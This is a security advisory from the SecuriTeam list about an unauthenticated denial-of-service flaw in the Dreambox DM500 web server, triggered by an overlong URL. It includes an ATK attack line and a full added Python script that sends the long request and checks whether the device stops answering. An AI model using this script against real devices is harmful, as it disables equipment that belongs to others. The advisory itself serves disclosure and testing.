[UNIX] Dreambox DM500 Webserver Long URL Request Denial of Service



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Dreambox DM500 Webserver Long URL Request Denial of Service
------------------------------------------------------------------------


SUMMARY

<http://www.dream-multimedia-tv.de/> Dreambox is "a Linux-based DVB
satellite, terrestrial and cable digital television decoder (set-top box),
produced by German multimedia vendor Dream Multimedia". Marc Ruef at scip
AG found an input validation error within the web interface of the model
DM500C. Other models, for example DM500S, might be affected too.

DETAILS

An attacker can send a very long HTTP request string (approximately 512
bytes) to the web server, which causes a denial of service. The web
interface, and some parts of the operating system, may stop responding.

Exploit:
It is possible to exploit the vulnerability with a common web browser by
requesting a sufficiently long URL.

The HTTP web server fingerprinting suite
<http://www.computec.ch/projekte/httprecon/> httprecon is able to
reproduce the problem too. Just use the test plugin get_long (activated by
default).

The Attack Tool Kit ( <http://www.computec.ch/projekte/atk/> ATK) is able
to exploit this vulnerability with the following generic ASL code (expand
the "aaa(...)" placeholder to the full length of the long URL request):
open|send GET http://192.168.0.1/aaa(...)
HTTP/1.0\n\n|sleep|close|pattern_not_exists HTTP/1.# ### *
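The following Python script is an added example that is not part of the
original advisory, of ATK or of httprecon. It reproduces the same
sequence the ASL line encodes: a baseline GET, the long GET, a pause, and
a second GET whose reply is checked for a "HTTP/1.x" status line (ATK's
pattern_not_exists check, inverted). The target address 192.168.0.1 is
taken from the ASL line, the path length of 600 bytes is an assumed test
parameter chosen to exceed the roughly 512 bytes the advisory mentions,
and the request builder and probe function are this example's own names.

```python
import re
import socket
import time

# Assumed defaults: the address is the one the advisory's ASL line uses,
# the path length is a test parameter above the ~512 bytes it reports.
DEFAULT_HOST = "192.168.0.1"
DEFAULT_PORT = 80
DEFAULT_PATH_LEN = 600

# A well-formed HTTP/1.x status line; ATK checks for the absence of
# "HTTP/1.#" in the reply to decide the server is down.
STATUS_LINE = re.compile(rb"^HTTP/1\.[01] \d{3}")


def build_long_request(path_len: int, filler: bytes = b"a") -> bytes:
    """Build "GET /aaa... HTTP/1.0" with path_len filler bytes after the slash.

    path_len == 0 yields a plain GET / used as the health probe.
    """
    if path_len < 0:
        raise ValueError("path_len must be non-negative")
    path = b"/" + filler * path_len
    # HTTP/1.0 needs no Host header; the blank line ends the request.
    return b"GET " + path + b" HTTP/1.0\r\n\r\n"


def server_answered(data: bytes) -> bool:
    """True when the reply starts with an HTTP/1.x status line."""
    return STATUS_LINE.match(data) is not None


def send_once(host: str, port: int, payload: bytes, timeout: float = 5.0) -> bytes:
    """Open a connection, send payload, read until close or timeout."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            while True:
                chunk = s.recv(4096)
                if not chunk:
                    break
                chunks.append(chunk)
        except socket.timeout:
            pass  # partial reply is still worth inspecting
    return b"".join(chunks)


def probe(host: str = DEFAULT_HOST, port: int = DEFAULT_PORT,
          path_len: int = DEFAULT_PATH_LEN, settle: float = 3.0) -> dict:
    """Reproduce the advisory's open|send|sleep|close|pattern_not_exists flow.

    Returns whether the server answered before, during and after the long
    request. A healthy server gives after_ok == True; the advisory's
    behaviour shows up as baseline_ok True and after_ok False.
    """
    result = {"baseline_ok": False, "long_request_answered": False, "after_ok": False}
    result["baseline_ok"] = server_answered(send_once(host, port, build_long_request(0)))
    try:
        long_reply = send_once(host, port, build_long_request(path_len))
        result["long_request_answered"] = server_answered(long_reply)
    except OSError:
        result["long_request_answered"] = False  # connection dropped or refused
    time.sleep(settle)
    try:
        result["after_ok"] = server_answered(send_once(host, port, build_long_request(0)))
    except OSError:
        result["after_ok"] = False  # no answer at all: web server is gone
    return result


if __name__ == "__main__":
    print(probe())
```

Run it only against a box you are allowed to take down: according to the
advisory a successful probe leaves the device unresponsive until it is
restarted, so there is no non-destructive way to confirm the result.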

Impact:
Because the attack requires no authentication, anyone who can reach the
web server can affect the behaviour of the device.

The web interface and some parts of the operating system stop responding.
A restart of the device is required to restore full functionality.

Disclosure timeline:
2008/04/28 Identification of the vulnerability by Marc Ruef
2008/04/30 First information to support-at-Dream-Multimedia-Tv.de
2008/04/30 Automated reply by the ticketing system (ticket id
2008043010000466)
2008/04/30 Manual response by Nils Weiberg announcing further
investigation
2008/05/22 Request for current state of investigation
2008/05/22 Another response by Nils Weiberg that the research is ongoing
2008/07/15 Last request for current state of investigation
2008/07/15 Another response by Nils Weiberg without further details
2008/08/29 Public disclosure of the advisory


ADDITIONAL INFORMATION

The information has been provided by <mailto:maru@xxxxxxx> Marc Ruef.
The original article can be found at:
<http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=3807>




DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


